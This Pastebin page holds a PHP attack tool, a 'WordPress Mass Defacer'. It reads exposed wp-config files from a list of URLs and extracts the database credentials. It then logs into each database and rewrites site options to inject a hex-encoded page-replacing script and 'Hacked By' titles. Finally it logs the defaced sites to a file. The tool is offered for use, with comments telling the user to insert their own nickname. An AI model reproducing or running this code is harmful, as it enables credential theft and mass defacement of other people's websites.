API tools faq
paste
Advertisement
Guest User

killer haxor

a guest
Aug 29th, 2018
413
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.76 KB | None | 0 0
raw download clone embed print report
  1. <?php
  2. /**
  3. * @author: K@ller HaX@R
  4. * @mail: killerhaxor@gmail.com
  5. * @Last Updated: 30 Jan 2016
  6. */
  7.  
  8. set_time_limit(0);
  9. ini_set('display_errors', 0);
  10.  
  11. echo '<html><head>
  12. <title>WordPress Mass Defacer By K@ller HaX@R</title>
  13. <meta content="text/html; charset=utf-8">
  14. <meta name="keywords" content="WordPress Defacer, K@ller HaX@R" />
  15. <meta name="description" content="WordPress Defacer" />
  16. <meta name="author" content="K@ller HaX@R" />
  17. <link href="http://fonts.googleapis.com/css?family=Iceland" rel="stylesheet" type="text/css">
  18. <link rel="stylesheet" type="text/css" href="http://faisalahmed.me/wp-content/assets/css/1.css">
  19. </head><body>';
  20.  
  21. echo '<div style="font-family: Iceland;font-size: 35pt;text-shadow: 0 0 6px #FF0000, 0 0 5px #FF0000, 0 0 5px #FF0000;color: #FFF">WordPress Mass Defacer<br><sub>K@ller HaX@R</sub></div><br/>';
  22.  
  23. echo '<form method="POST" action="" ><center><table border="1">
  24. <tr><td>Config List:</td><td><textarea name="url" cols="50" rows="10" ></textarea></td></tr>
  25. <tr><td>Deface :</td><td><textarea name="index" cols="50" rows="10" ></textarea></td></tr></table>
  26. <br><input type="Submit" class="button" value="Submit"><input type="hidden" name="action" value="1"></form></center>';
  27.  
  28. if ($_POST['action']=='1'){
  29. if ($_POST['url']==''){
  30. echo "<div class='result'>No CONFIG FOUND<br>Make sure you provided a config list!</div><br>";
  31. }else{
  32. $url=$_POST['url'];
  33. $users = explode("\n",$url);
  34. foreach ($users as $user) {
  35. $user1=trim($user);
  36. $code=file_get_contents2($user1);
  37. preg_match_all('|define.*\(.*\'DB_NAME\'.*,.*\'(.*)\'.*\).*;|isU',$code,$b1);
  38. $db=$b1[1][0];
  39. preg_match_all('|define.*\(.*\'DB_USER\'.*,.*\'(.*)\'.*\).*;|isU',$code,$b2);
  40. $user=$b2[1][0];
  41. preg_match_all('|define.*\(.*\'DB_PASSWORD\'.*,.*\'(.*)\'.*\).*;|isU',$code,$b3);
  42. $db_password=$b3[1][0];
  43. preg_match_all('|define.*\(.*\'DB_HOST\'.*,.*\'(.*)\'.*\).*;|isU',$code,$b4);
  44. $host=$b4[1][0];
  45. preg_match_all('|\$table_prefix.*=.*\'(.*)\'.*;|isU',$code,$b5);
  46. $p=$b5[1][0];
  47.  
  48. $d=@mysql_connect( $host, $user, $db_password ) ;
  49. if ($d){
  50. @mysql_select_db($db );
  51. $source=stripslashes($_POST['index']);
  52. $s2=strToHex(($source));
  53. $s="<script>document.documentElement.innerHTML = unescape(''$s2'');</script>";
  54. $ls=strlen($s)-2;
  55. $sql="update ".$p."options set option_value='a:2:{i:2;a:3:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:$ls:\"$s\";s:6:\"filter\";b:0;}s:12:\"_multiwidget\";i:1;}' where option_name='widget_text'; ";
  56. mysql_query($sql) ;
  57. $sql="update ".$p."options set option_value='a:7:{s:19:\"wp_inactive_widgets\";a:6:{i:0;s:10:\"archives-2\";i:1;s:6:\"meta-2\";i:2;s:8:\"search-2\";i:3;s:12:\"categories-2\";i:4;s:14:\"recent-posts-2\";i:5;s:17:\"recent-comments-2\";}s:9:\"sidebar-1\";a:1:{i:0;s:6:\"text-2\";}s:9:\"sidebar-2\";a:0:{}s:9:\"sidebar-3\";a:0:{}s:9:\"sidebar-4\";a:0:{}s:9:\"sidebar-5\";a:0:{}s:13:\"array_version\";i:3;}' where option_name='sidebars_widgets';";
  58. mysql_query($sql) ;
  59. if (function_exists("mb_convert_encoding") )
  60. {
  61. $source2 = mb_convert_encoding('</title>'.$source.'<DIV style="DISPLAY: none"><xmp>', 'UTF-7');
  62. $source2=mysql_real_escape_string($source2);
  63. $sql = "UPDATE `".$p."options` SET `option_value` = 'Hacked By K@ller HaX@R' WHERE `option_name` = 'blogname';"; // Change K@ller HaX@R to your Nick
  64. @mysql_query($sql) ; ;
  65. $sql = "UPDATE `".$p."options` SET `option_value` = 'K@ller HaX@R Was Here' WHERE `option_name` = 'blogdescription';"; // Change K@ller HaX@R to your Nick
  66. @mysql_query($sql) ; ;
  67. $sql= "UPDATE `".$p."options` SET `option_value` = 'UTF-7' WHERE `option_name` = 'blog_charset';";
  68. @mysql_query($sql) ; ;
  69. }
  70. $aa=@mysql_query("select option_value from `".$p."options` WHERE `option_name` = 'siteurl';") ;;
  71. $siteurl=@mysql_fetch_array($aa) ;
  72. $siteurl=$siteurl['option_value'];
  73. $tr.="$siteurl\n";
  74. mysql_close();
  75. }
  76. }
  77. if ($tr)
  78. $filename = 'list.txt';
  79. $fp = fopen($filename, "a+");
  80. $write = fputs($fp, $tr);
  81. fclose($fp);
  82. echo "<div class='result'>Defacing Completed ! smile emoticon<br><br>";
  83. echo "<a href='list.txt' target='_blank'>View List of Defaced Sites</a></div><br/>";
  84. //echo "Index changed for <br><br><textarea cols='50' rows='10' >$tr</textarea>";
  85. }
  86. }
  87.  
  88. function strToHex($string)
  89. {
  90. $hex='';
  91. for ($i=0; $i < strlen($string); $i++)
  92. {
  93. if (strlen(dechex(ord($string[$i])))==1){
  94. $hex .="%0". dechex(ord($string[$i]));
  95. }
  96. else
  97. {
  98. $hex .="%". dechex(ord($string[$i]));
  99. }
  100. }
  101. return $hex;
  102. }
  103.  
  104. function file_get_contents2($u){
  105.  
  106. $ch = curl_init();
  107. curl_setopt($ch,CURLOPT_URL,$u);
  108. curl_setopt($ch, CURLOPT_HEADER, 0);
  109. curl_setopt($ch,CURLOPT_RETURNTRANSFER,true);
  110. curl_setopt($ch,CURLOPT_USERAGENT,"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:12.0) Gecko/20100101 Firefox/12.0 ");
  111. $result = curl_exec($ch);
  112. return $result ;
  113. }
  114. echo "<br><br>&#169; K@ller HaX@R";
  115. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!